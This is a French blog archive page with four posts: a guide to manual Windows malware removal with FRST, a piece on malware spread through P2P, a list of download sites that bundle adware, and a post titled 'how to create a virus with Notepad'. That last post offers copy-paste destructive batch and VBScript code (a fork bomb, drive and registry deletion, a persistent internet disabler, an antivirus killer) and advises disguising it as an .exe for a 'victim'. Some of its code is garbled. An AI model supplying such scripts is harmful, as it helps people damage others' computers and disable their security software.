Powered By Blogger

Rechercher sur ce blogue

Aucun message portant le libellé virus. Afficher tous les messages
Aucun message portant le libellé virus. Afficher tous les messages

samedi 5 août 2017

Désinfection manuelle de Windows (Trojan, Adware etc)



Dans cet article, j’explique le principe des désinfections manuelles qui s’effectuent généralement sur les forums.
Cela peut servir aux geek de la famille à qui on ramène les Windows malades.
Le but est de bien comprendre sur quoi repose ces désinfections de virus et comment procéder.
Ceci est donc une illustration des désinfections faites à partir de l’utilitaire FRST.
Cette page est donc à destination des personnes à l’aide en informatique et ayant une connaissance minimale en informatique et Windows.

Adblock - Publicité bloquée
Vous pénalisez le site WEB. Svp débloquez la publicité pour malekal.com
Lire A propros de pour plus d'informations.

Principe

Avant d’entrer dans le vif du sujet, il faut comprendre sur quoi repose ces désinfections.
Tout d’abord, nous allons juste rappeler de quoi est composé un logiciel malveillant.
  • Une partie active, c’est le processus en mémoire actif qui effectue les actions, ce pourquoi, le logiciel malveillant a été conçue. Ce processus peut prendre la forme d’un .exe ou d’une DLL
  • L’utilisation d’un point de chargement de Windows, cela permet au virus informatique de se charger à chaque démarrage de Windows. Il existe beaucoup de point de chargement sur Windows.
Bien entendu, on a toujours des exceptions, comme par exemple, le remplacement de fichiers systèmes : Trojan Patched et remplacement de fichiers systèmes de Windows.
FRST est un programme qui effectue un analyse de Windows et génère des rapports.
Ces rapports contiennent des points de chargements de Windows, les processus en cours d’exécution, une partie des DLL chargées en mémoire, les derniers fichiers modifiés dans le système et bien d’autres données.
A partir, d’une analyse de ces informations, il est possible de trouver certains logiciels malveillants et de les éradiquer.
La suppression se fait à partir d’un script de correction que l’on fournit à FRST et qui indique les fichiers, clés et autres éléments à supprimer de Windows.
Pour les plus anciens des internautes, il s’agit du même principe que le fameux HijackThis qui est devenu trop limité sur le contenu de l’analyse système et plus maintenu.
Avec une bonne pratique, les avantages sont de pouvoir vérifier et supprimer les virus qui ne sont pas détectés par les programmes traditionnels : RogueKiller, ZHPCleaner, AdwCleaner, Malwarebytes-Anti Malware.
On se rapproche plutôt des outils proposés sur cette page : Comment vérifier si ordinateur a été hacké ou piraté ?
A travers l’analyse des processus en cours de chargement et des points de chargement de Windows.
L’inconvénient concerne ceux qui ne veulent pas avoir à réfléchir et passer des outils automatiques.
pjjoint est l’outil idéal, ce dernier permet d’analyser les rapports FRST, ainsi vous pouvez avoir déjà un aperçu à travers une base de données recensant les programmes légitimes.

Analyse rapport FRST

Quelques informations sur les rapports FRST et leur composition.
Les rapports FRST sont composés de trois rapports (si vous cochez bien les options comme indiqué dans le tutoriel FRST)
  • FRST.txt : contient les processus, clés RUN, informations navigateurs WEB, pilotes et derniers fichiers modifiés
  • Addition.txt : liste les programmes installés, les tâches planifiées
Les couleurs de pjjoint :
  • En rouge gras : connus pour être malveillant
  • En rouge : détection générique afin d’attirer l’attention, pas forcément malveillant mais peut l’être
  • En vert : légitime
  • En gris : pas de statut

FRST.txt

L’en-tête fournit les informations du rapport FRST.txt, l’utilisateur Windows et les versions de Windows.
puis la liste des processus en cours d’exécution durant le scan FRST.

Vient ensuite les clés Run et startup.
On peut aussi y trouver les clés IFEO.

puis la configuration des navigateurs WEB, listant les extensions installées.

puis les services Windows et pilotes.

les derniers fichiers modifiés ou créés, sur un mois.


Enfin le rapport FRST se termine par les hashs de fichiers systèmes afin de détecter d’éventuel patch.
FRST indique si les fichiers systèmes sont signés numériquement.
Si l’option BCD a été coché, le contenu du BCD est donné.

Addition.txt

Les rapports Addition.txt ne sont pas évalués par pjjoint.
Voici l’en-tête du rapport Addition.txt assez similaire à FRST.txt
puis on enchaîne sur les informations utilisateurs, ainsi que les antivirus installés.
Du moins, la liste retournée par Windows (qui peut-être fausse).
puis la liste des programmes installés dans Windows.

puis les raccourcis, souvent modifiés par des Browser Hijacker pour forcer des moteurs de recherche.
Les modules chargés dans explorer.exe
Puis les tâches planifiées de Windows.

Pour les raccourcis, vous pouvez générer un fichier Shortcut.txt qui liste tous les raccourcis et permet de récupérer les raccourcis Windows modifier afin de faire lancer un moteur de recherche en particulier. Exemple launchpage.org où on voit que Shortcut.txt en liste beaucoup plus :


puis d’autres infos dont un aperçu du fichier HOSTS de Windows qui peut-être modifiés (Hijack.HOSTS).
On trouve aussi les informations DNS.
et les entrées mconfig, si l’utilisateur a désactivé certains programmes au démarrage de Windows.

les règles du pare-feu de Windows

Quelques informations comme les points de restauration de Windows, puis les périphériques non installés (gestionnaires de périphériques) et certains contenu de l’observateur d’événements de Windows.

Enfin la configuration matérielle de l’ordinateur.

Adblock - Publicité bloquée
Vous pénalisez le site WEB. Svp débloquez la publicité pour malekal.com
Lire A propros de pour plus d'informations.

Désinfection virus

Aidez vous de pjjoint pour analyser les rapports FRST.
En cas de doute sur un fichier ou autres, vous pouvez :
  • une analyse VirusTotal de ce fichier,
  • une recherche Google incluant si possible le chemin complet avec des “, exemple : “C:\Windows\system32\csrss.exe”
  • vérifiez avec herdprotect, exemple sur Google : herdprotect c:\windows\system32\csrss.exe
Pjjoint aide à mettre de côté les fichiers légitimes. Avec l’habitude, vous verrez que c’est à peu près toujours les mêmes programmes qui reviennent.
Le but est de noter chaque ligne malveillante et liés à des cheval de troie, virus et autres afin de constituer une correction FRST.
C’est parti pour quelques exemples et subtilités.

Startup, clé Run et services Windows

Rien d’exception, il suffit de vérifier ces derniers.
En général, pjjoint les reconnaît.

Prêtez une attention au fichier non signé numériquement.


Clé IFEO

Les clés du registre Windows IFEO pour Image File Execution Options sont des clés, initialement prévus pour débugger permettant l’exécution d’un exécutable lorsqu’un exécutable en particulier se lance.
La clé se trouve dans HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options suivi du nom de l’exe.
Dans l’exemple ci-dessous, à chaque exécution de GoogleUpdate.exe (légitime), un exécutable avec des chiffres (malveillant) sera aussi lancé.

Si aucun exécutable n’est spécifié alors le fichier ne pourra se lancer.
Ci-dessous, le gestionnaire de tâches (taskmgr.exe) ne pourra être démarré.

Même chose ci-dessous pour prévenir de l’exécution de FRST, HijackThis etc :

Malwarebytes Anti-Malware peut détecter ces derniers en PUP.Optional.IFEO

Extension malveillante sur Chrome

Les extensions malveillantes (Adwares/PUPs)  sur Chrome et Firefox sont identifiées par des ID.
Il suffit alors d’effectuer une recherche Google afin de vérifier si celle-ci se trouve dans le magasin de Chrome et si elle est “connue”.

Drivers malveillants

Exemple de pilotes malveillants avec ucguard / UCBrowser et Netutils


Trojan RAT

Quelques exemples de rapports FRST avec des Trojans RAT.
La plupart du temps, ces derniers se chargent par des clés RUN ou Startup.
Parfois des tâches planifiées.
La tâche planifiée et les dossiers du Trojan RAT qui correspondent :



Un Trojan RAT qui se chargent par des clés RUN et Startup :

De multiples dossiers dans %APPDATA%, l’attribut H montre que ces derniers sont attributs cachés (hidden).

Malware Filess

Ces derniers se chargent par des clés Run qui contiennent un script dans la clé.
Plus d’infos : Malware ‘FileLess’ : PoweLiks, Kovter, Gootkit et les Les virus ou trojan Powershell
Clé Run avec mshta :

Signature fichiers systèmes

Ci-dessous un exemple de fichier système patché (modifié afin d’effectuer des opérations malveillantes).
Le fichier dnsapi.dll est modifé et donc, il n’est plus signé numériquement.
FRST indique le MD5 du fichier, vous pouvez éventuellement effectuer une recherche sur Google.

Correction FRST

Une fois, les lignes malveillantes repérées et notées.
Vous pouvez effectuer une correction FRST afin de supprimer les logiciels malveillants de Windows.
Pour cela, il faut créer un fichier fixlist.txt qui doit impérativement se trouver dans le même dossier que Windows.

  • CreateRestorePoint: demande la création d’un point de restauration système.
  • CloseProcesses: tue tous les processus non essentiels de Windows
  • cmd: permet de lancer une commande cmd, dans l’exemple on vide le catalogue Winsock.
  • reg: permet de passer une commande reg, même syntaxe que celle de l’invite de commandes de Windows.
    • reg add, vous pouvez créer des clés en indiquant la valeur etc
    • reg delete, vous pouvez supprimer des clés du registre Windows
  • HOSTS: vide le fichier HOSTS de Windows.
  • EmptyTemp : vide les fichiers temporaires
  • RemoveProxy : supprimer tous les proxys de Windows
  • Reboot: fait redémarrer l’ordinateur une fois la correction effectuée.
Vous pouvez donc indiquer les clés Run, Services et autres directement, ainsi que les lignes de fichiers modifiés.
Vous pouvez aussi donner le chemin complet d’un fichier ou dossier afin de faire supprimer ce dernier.
Pour une syntaxe complète des scripts FRST, rendez-vous sur la page:  FRST Tutorial – How to use Farbar Recovery Scan Tool
Relancez alors FRST puis cliquez sur le bouton Correction (Fix en anglais) pour lancer l’opération.

En vidéo

Exemple de suppression de cheval de troie et désinfection Windows en vidéo :

Liens autour de la suppression de virus

Sans oublier, le menu du site : Virus & Sécurité.

REF.:

Le Peer-to-peer (P2P) et les virus



Le Peer-to-Peer (P2P) est un mode d’échange de fichiers entre internautes qui a très vite permis de mettre en ligne des fichiers illégalement, en échappement aux droits d’auteurs.
Parmi ces fichiers, on trouve beaucoup de logiciels crackés, c’est à dire soit modifié, soit contenu un petit programme qui permet de mettre en veille ou contourner la licence de l’application afin de pouvoir l’utiliser gratuitement. Ainsi, le P2P est donc aussi très vite devenu populaire.
Cette popularité est exploitée par les auteurs de virus en mettant en ligne des programmes malveillants à travers ces applications crackées.
Voici un tour d’horizon des menaces qui ont pu exister et comment elles se sont propagés à travers le P2P.


Introduction au P2P

Avant de commencer sur le côté virus, il existe plusieurs protocoles différents et plusieurs logiciels, qui ont aussi évolués dans le temps.
Le fonctionnent est grosso modo identique mais avec quelques variantes, dans tous les cas, l’internaute fait client/serveur, c’est à dire qu’il peut téléchargé chez les autres des morceaux du fichiers souhaités tout en les mettant à disposition des autres internautes. C’est la force du P2P.
En gros les modes P2P les plus connus sont :
  • Emule où l’age d’or se situe plutôt entre 2002 et 2013, ce dernier fonctionne avec des serveurs centralisés, on s’y connecte, on a obtient la liste des programmes mis en ligne par les internautes, que l’on peut télécharge et mettre en ligne à son tour.
  • Bittorrent qui a maintenant supplanté Emule, il s’agit de serveurs décentralisés, chaque client fait ensuite office de noeud. L’internaute télécharge un .torrent qui récupère une liste de noeuds. Le client P2P s’y connecte afin de mettre à jour et pouvoir ensuite téléchargé les morceaux du fichiers en ligne. Actuellement, le client Bittorent le plus populaire est utorrent.
En contrôlant les ordinateurs infectés, il peut être possible de partager ensuite des fichiers malveillants, ainsi l’ordinateur infecté est aussi utilisé, à travers le P2P pour infecter d’autres internautes.
C’est le principe des vers informatiques ou worm en anglais.

Les virus sur Emule

Emule a très vite été utilisé pour diffuser des logiciels malveillants, ainsi, le principe est assez simple, une fois contaminé, le virus va créer des zip de cracks dans le répertoire de partage de l’utilisateur.
Les internautes vont télécharger ces derniers et se mettre ensuite à diffuser ces cracks malveillants.
Par exemple, dans les années 2007 et 2008, Bagle était très actif de ce côté là : Bagle/Beagle/Trojan.Tooso.R
Bagle un trojan par Peer-to-peer (P2P) Bagle un trojan par Peer-to-peer (P2P)
Cette vidéo montre la création des cracks vérolés par Bagle lorsque l’ordinateur est infecté par ce trojan :

Les torrents peuvent renfermer aussi des logiciels malveillants.
Les auteurs de malwares peuvent tout simplement mettre en ligne des logiciels embarquant des trojan, et autres logiciels malveillants.
Parmi les cheval de troie assez élaboré et utilisant les torrents pour se diffuser, on peut Trojan.Sathurbot.


Une fois l’ordinateur infecté par Trojan.Sathurbot, l’ordinateur va tenter d’attaquer des sites internet en WordPress, si le piratage fonctionne, le contenu du site internet sera modifié pour mettre en ligne de fausses pages de logiciels torrent.
Si un internaute tombe dessus et télécharge ce torrent, en exécutant le contenu, il va infecter son ordinateur qui à son tour va tenter d’attaquer des sites internet.
Le Trojan Sathurbot en vidéo avec le mode de propagation avec par des attaques par brute force  :

L’éditeur d’antivirus ESET s’est aussi fait l’écho d’un ransomware visant Mac propagé à travers des torrent piégés : New crypto-ransomware hits macOS
Là aussi, on met en ligne des cracks, par exemple pour Adobe Premiere Pro comme le montre cette capture d’écran :
Un ransomware diffusé par Peer-to-peer (P2P)
Le zip renferme un fichier “patcher” qui s’avère être le ransomware.
Un ransomware diffusé par Peer-to-peer (P2P)

Client Torrent et PUP

Enfin les clients torrent, comme tout logiciels peuvent proposer l’installation de programmes potentiellement indésirable (PUP) qui s’avèrent être la plus part du temps des adwares.
Plus d’informations, se reporter aux pages :

Conclusion

Comme vous pouvez le constater, il est relativement simple d’utiliser le P2P pour propager des virus, tout simplement car le contenu n’est pas centralisé.
Cela permet donc très facilement mettre en ligne du contenu malveillant.
Le problème de télécharger des cracks par P2P rentre dans le cadre du téléchargement de sources non sûres.
Les fichiers sont mis en lignes par des inconnus, vous ne savez pas ce qui est au bout, sauf après avoir exécuter sur votre ordinateur le contenu, or souvent, il est trop tard.
C’est tout simplement la loterie.
Ces sources non sûres valent aussi pour le téléchargement de fichiers comme 1fichiers, uptobox ou mega. D’ailleurs, il se passe la même chose avec les virus sur Youtube : Arnaques et virus sur Youtube
En clair donc, télécharger depuis ces sources non sûrs est à l’extrême opposé des bons réflexes de la sécurité informatique.


Liens autour des virus et cracks

Pour aller plus loin dans les virus par cracks :
REF.:

jeudi 22 juin 2017

Comment créer un virus avec Notepad



Comment créer un virus dangereux avec Notepad ,pour contre-attaquer un Hacker !


 Les virus sont des logiciels malveillants qui peuvent causer beaucoup de dommages à P.C., ordinateur et ordinateur portable. Habituellement, ils se répandent grâce au partage de fichiers spécialement sur Internet. Le partage de fichiers Torrents et les pièces jointes aux courriers électroniques sont des moyens courants de propagation d'un virus.
 
Avant d'entrer dans les détails, permettez-moi d'expliquer quel est un fichier batch? Il s'agit simplement d'un fichier texte contenant des séries de commandes exécutées automatiquement, ligne par ligne, lorsque le fichier batch s'exécute. J'ai utilisé plusieurs virgules pour diviser la phrase en plusieurs parties pour faciliter la compréhension.
 
Ainsi, en utilisant Batch File, vous pouvez créer des virus extrêmement dangereux pour supprimer les fichiers Windows, formater différents lecteurs (C:, D:, E :), voler des informations, désactiver les pare-feu.
 
Maintenant, voici quelques virus de fichiers par lots, mais extrêmement dangereux. Vous devez simplement appuyer sur Ctrl + C (Copier) et Ctrl + V (Coller) dans le Bloc-notes. Ensuite, enregistrez le fichier du bloc-notes comme "anyname.bat". Assurez-vous d'utiliser '.bat' comme extension, sinon cela ne fonctionnera pas.


1. Application Bomber:-
@echo off
😡
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
Fonction: une fois exécuté, il va commencer à ouvrir plusieurs applications à plusieurs reprises, ce qui affectera les performances du système. Vous pouvez également ajouter une application de votre choix dans le code ci-dessus.

2. Folder Flooder-

@echo off
😡
md %random%
/folder.
goto x
Fonction: une fois exécuté, il va commencer à générer des dossiers dont le nom peut être n'importe quel nombre aléatoire.

3. User Account Flooder:-

@echo off
:xnet
user %random% /add
goto x
Fonction: une fois exécuté, il va commencer à créer des comptes utilisateur Windows dont le nom peut être un nombre aléatoire.

4. Process Creator:-

%0|%0
Fonction: - Une fois exécuté, il commencera à générer un grand nombre de processus très rapidement entraînant une suspension de P.C.

5. Internet Disabler:-

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE
Fonction: une fois exécuté, il désactive la connexion Internet d'un ordinateur en permanence.

6. O.S. Hacker:-

@Echo off
Del C: *.* |y
Fonction: - Une fois qu'il sera exécuté, il formatera le lecteur de disque C et entraînera donc la suppression de l'O.S. Vous pouvez également remplacer C par n'importe quel lecteur de votre choix.

7. Registry Deleter:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE
Fonction: - Une fois exécuté, il supprime les fichiers de registre et laisse un message. Cela peut très affecter l'ordinateur de la victime.

8. Crazy Caps Lock:-

Set wshShell
=wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Fonction: - Une fois qu'il est exécuté, il sera activé et désactivé par Caps Lock en cas d'ennui de l'utilisateur.

9. Anti Virus Disabler:-

@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.datcls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda
software*.*
rem

Fonction: - Une fois exécuté, il désactivera Anti Virus du système de la victime.

L'inconvénient d'un fichier batch est que n'importe qui peut l'ouvrir avec un bloc-notes et lire la commande facilement. En outre, tout le monde peut le supprimer s'il le juge nuisible. Ainsi, pour surmonter la limitation / inconvénient, vous pouvez utiliser un outil cool nommé 'Batch to Exe Converter'. Il convertira l'extension '.bat' en extension '.exe'. Et votre fichier Batch sera converti en un fichier d'application. Vous pouvez facilement convaincre votre victime d'ouvrir le fichier.
Un message personnel à vous
C'est agréable de voir que vous avez passé par «Post Facebook Status in Future» complètement. J'espère que vous avez apprécié cet article. Cependant, si vous voulez que je livre des tutoriels et des articles de piratage plus intéressants, merci de partager mes postures. Vous pouvez utiliser le Widget de partage social fourni à la fin de chaque publication. Après tout, le partage est pris en charge !!!
Je vous remercie. Avoir une belle journée à l'avance!!!


REF.:

jeudi 8 juin 2017

Malwares Virus: Les sites de téléchargements qui repackent



Suite au topic sur le repacks chez Clubic, je vais commencer à énumérer les “gros” sites de téléchargement qui effectuent du repack.
Si vous en avez à proposer, n’hésitez pas à me contacter.
Pour rappel, la pratique consiste à proposer un installeur qui va proposer des logiciels additionnels que je qualifierai de parasites, ces programmes sont en général :
  • Des Browser Hijacker qui vont modifier la page de démarrage et moteurs de recherche de tous les navigateurs WEB pour vous obliger à utiliser un moteur de recherche en particulier.
  • Des adwares (logiciels publicitaires) qui vont inonder vos pages WEB de publicités en plus de celles habituelles.
  • Repack : réutiliser des logiciels gratuits en y incorporant des logiciels additifs (souvent de type adwares ou Browser Hijacker)
Ces programmes ralentissent le surf ou l’ordinateur.
Les explications plus détaillées et bonnes pratiques sur ces programmes parasites sur la page : Programmes parasites / PUPs
Le but de ces programmes est donc de faire gagner de l’argent aux éditeurs mais c’est aussi une nouvelle méthode pour les sites de téléchargement de monétiser leurs sites puis qu’ils touchent aussi de l’argent à chaque installation réussie de ces programmes.
Les sites qui ne repackent pas :

Les sites de téléchargements qui pratiquent ces repacks ou proposent des programmes parasites.
Notez que le repack n’a pas lieu avec Google Chrome, car ce dernier bloque ces téléchargements (malwares), plus d’informations sur la page : Google SafeBrowsing et blocage de PUPs/Adwares

Telecharger.com

PCTuto/Tuto4PC : association avec 01net
PCTuto et 01net : Le foutage de gueule continue
01net/telecharger.com : ça ne s’arrange pas…
01Net PC Optimizer pour ne pas optimiser son PC


telecharger.com2 telecharger.com

ClubIC

https://www.malekal.com/2014/11/26/clubic-repack-pups/
Clubic_repack_vosteran

filehippo.com (retiré)

filehippo.com semble correct maintenant (EDIT 29 mai 2015)
FileHippo Downloader

SourceForge


sourceforge

Download.com / Cnet (Version US)

CNET

Softonic

Softonic : Repack de logiciels => PUPs / LPIs

Softonic_RegCleandownloadastro.com

downloadastro

Soft32.fr

Soft32




Portalux.com

portalux

Malavida.com

Malavida

telecharger.logiciel.net


logiciel.net

sur-telecharger.com

avec d’autres adresses :
monde-software.com
downloaden-gratis.com
sur-telecharger.com
01-telecharger.com
bajar-programas.com
top20soft.com
downloaden-jetzt.com
zona-descargas.com

sur-telecharger.comSoft-Box.net

La même charte graphique que précédemment mais pour des arnaques SMS.
Soft-box

top-logiciels.com

Bis repetitis

top-logicielsSoftbian.com et consorts

softbian

file3k

itwiss.com

itwiss

etc
etc

EDIT – 4 Avril 2017

01net / telecharger.com propose des logiciels de nettoyage peu fiables, voir limite proche de l’arnaque.
Plus d’informations, se reporter sur la page : Les logiciels de nettoyage de Windows.

Chez Clubic, on propose Ad-Aware Search helper, une extension qui vise à pousser le moteur de recherche Yahoo!
Extension parasite ?
Cette extension est en ligne droite sur Google SafeBrowsing et blocage de PUPs/Adwares



Liens autour du repack

REF.: